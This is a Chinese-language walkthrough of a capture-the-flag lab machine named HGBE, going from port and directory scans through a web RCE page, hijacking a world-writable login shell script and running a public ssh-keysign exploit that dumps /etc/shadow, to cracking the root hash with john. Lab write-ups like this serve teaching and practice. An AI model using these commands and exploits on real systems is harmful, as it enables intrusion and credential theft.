HGBE

靶机:HGBE
作者:群主
靶机ID: 662
系统:Linux
难度:Baby

信息搜集

192.168.43.132

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
┌──(root㉿Eecho)-[~]
└─# rustscan -a 192.168.43.132 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.43.132:22
Open 192.168.43.132:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.132
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-18 14:40 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
Initiating ARP Ping Scan at 14:40
Scanning 192.168.43.132 [1 port]
Completed ARP Ping Scan at 14:40, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:40
Completed Parallel DNS resolution of 1 host. at 14:40, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:40
Scanning 192.168.43.132 [2 ports]
Discovered open port 80/tcp on 192.168.43.132
Discovered open port 22/tcp on 192.168.43.132
Completed SYN Stealth Scan at 14:40, 0.01s elapsed (2 total ports)
Initiating Service scan at 14:40
Scanning 2 services on 192.168.43.132
Completed Service scan at 14:40, 6.02s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.132
Retrying OS detection (try #2) against 192.168.43.132
NSE: Script scanning 192.168.43.132.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:40
Completed NSE at 14:40, 0.23s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:40
Completed NSE at 14:40, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
Nmap scan report for 192.168.43.132
Host is up, received arp-response (0.00057s latency).
Scanned at 2026-05-18 14:40:06 CST for 9s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0p2 Debian 7+deb13u1 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.66 ((Debian))
|_http-title: Bye HGBE
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.66 (Debian)
MAC Address: 08:00:27:7A:71:C0 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Android 5 - 10 (Linux 3.4 - 3.18) (93%), Linux 2.6.32 (93%), Google Chromecast or Roku TV (Linux 4.9) (93%), Android 10 - 12 (Linux 4.14 - 4.19) (93%), Linux 5.10 - 5.19 (93%), Nintendo Switch (93%), Linux 3.2 - 4.14 (93%), Linux 5.4 - 5.10 (93%), OpenWrt 21.02 (Linux 5.4) (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.99%E=4%D=5/18%OT=22%CT=%CU=39390%PV=Y%DS=1%DC=D%G=N%M=080027%TM=6A0AB44F%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=Z%TS=22)
SEQ(SP=105%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=21)
OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5=M5B4ST11NW8%O6=M5B4ST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW8%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.000 days (since Mon May 18 14:40:14 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.57 ms 192.168.43.132

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.45 seconds
Raw packets sent: 47 (3.672KB) | Rcvd: 31 (2.616KB)

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿Eecho)-[~]
└─# gobuster dir -u http://192.168.43.132/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,back,cgi,jpg,json,md
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.43.132/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: md,php,txt,html,back,cgi,jpg,json
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 860]
shell.php (Status: 200) [Size: 15203]
......

shell.php是一个直接能rce的页面

image

反弹shell

image

提权

www -> HGBE

查看passwd文件可以看到HGBE用户的Shell被改成了/opt/a

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@Maze:/var/www/html$ cd /opt/
www-data@Maze:/opt$ ls
a b
www-data@Maze:/opt$ cat a
#!/bin/bash
exec /usr/bin/tty-clock -sc
www-data@Maze:/opt$ cat b
HGBE/HGBE
www-data@Maze:/opt$
www-data@Maze:/opt$ ls -al
total 16
drwxr-xr-x 2 root root 4096 May 15 22:39 .
drwxr-xr-x 18 root root 4096 May 15 18:24 ..
-rwxrwxrwx 1 root root 40 May 15 22:39 a
-rwxrwxrwx 1 root root 10 May 15 22:39 b

可以看到被改成了执行tty-clock。又泄露了HGBE的密码(HGBE),因为权限是777所以可以修改/opt/a文件来覆盖tty-clock

1
2
3
4
5
6
7
www-data@Maze:/opt$ echo -e '#!/bin/bash\n/bin/bash' > /opt/a
www-data@Maze:/opt$ cat a
#!/bin/bash
/bin/bash
www-data@Maze:/opt$ su HGBE
Password:
HGBE@Maze:/opt$

HGBE -> root

查找suid文件

1
2
3
4
5
6
7
8
9
10
11
12
HGBE@Maze:/opt$ find / -perm /4000 -type f 2> /dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/chfn

这里的ssh-keysign怀疑是刚出的2026-05-14

这个漏洞可以读私钥和shadow文件

https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
HGBE@Maze:~$ git clone https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn.git
Cloning into 'ssh-keysign-pwn'...
remote: Enumerating objects: 14, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 14 (delta 3), reused 11 (delta 1), pack-reused 0 (from 0)
Receiving objects: 100% (14/14), 2.34 MiB | 787.00 KiB/s, done.
Resolving deltas: 100% (3/3), done.
HGBE@Maze:~$ ls
ll-privesc-kit ssh-keysign-pwn user.txt
HGBE@Maze:~$ cd ssh-keysign-pwn/
HGBE@Maze:~/ssh-keysign-pwn$ ls
chage_pwn.c demo.gif demo.mp4 exploit_vuln_target.c Makefile README.md sshkeysign_pwn.c vuln_target.c
HGBE@Maze:~/ssh-keysign-pwn$ gcc chage_pwn.c -o chage_pwn
HGBE@Maze:~/ssh-keysign-pwn$ chage_pwn root
bash: chage_pwn: command not found
HGBE@Maze:~/ssh-keysign-pwn$ ./chage_pwn root
fd 5 -> /etc/shadow (round=44 try=8640)
root:$1$ruYlbiCu$mBcGHz1E10Io.PT.JVnml0:20568:0:99999:7:::
daemon:*:20568:0:99999:7:::
bin:*:20568:0:99999:7:::
sys:*:20568:0:99999:7:::
sync:*:20568:0:99999:7:::
games:*:20568:0:99999:7:::
man:*:20568:0:99999:7:::
lp:*:20568:0:99999:7:::
mail:*:20568:0:99999:7:::
news:*:20568:0:99999:7:::
uucp:*:20568:0:99999:7:::
proxy:*:20568:0:99999:7:::
www-data:*:20568:0:99999:7:::
backup:*:20568:0:99999:7:::
list:*:20568:0:99999:7:::
irc:*:20568:0:99999:7:::
_apt:*:20568:0:99999:7:::
nobody:*:20568:0:99999:7:::
systemd-network:!*:20568:::::1:
dhcpcd:!:20568::::::
systemd-timesync:!*:20568:::::1:
messagebus:!*:20568::::::
sshd:!*:20568::::::
HGBE:$y$j9T$6s8e/tmZzXrU4OrSoRLon0$KZP4gL2mULtpnfaPi5lkgxENm7XsJyxZsFfNiOK8XG0:20589:0:99999:7:::
ll104567:$y$j9T$DsJIEsWyKmgsyfagD.NiU/$O2iv6sfA1EaKiBMGd5z2Q1M3nZWX3Uyzr.FkgSQz9G.:20589:0:99999:7:::
mono:$y$j9T$UR5AFwviu9GhcPHEyJm8m/$PZX86ZOVLxDHM8qtf4j/D7byiFaEl7g5XrcJGrr54e5:20589:0:99999:7:::
lzh:$y$j9T$4Hb4MDqV5X/eYrwX20DG/.$L83CJ2ClORTxjovzJhO9YpSFbTitH.IKJTAc.Q76rEA:20589:0:99999:7:::

爆破hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# vim hash.txt
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
juju01 (root)
1g 0:00:00:00 DONE (2026-05-18 15:08) 3.225g/s 646606p/s 646606c/s 646606C/s marrufo..jack31
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

切换root

1
2
3
4
5
HGBE@Maze:~/ssh-keysign-pwn$ su root
Password:
root@Maze:/home/HGBE/ssh-keysign-pwn# id
uid=0(root) gid=0(root) groups=0(root)
root@Maze:/home/HGBE/ssh-keysign-pwn#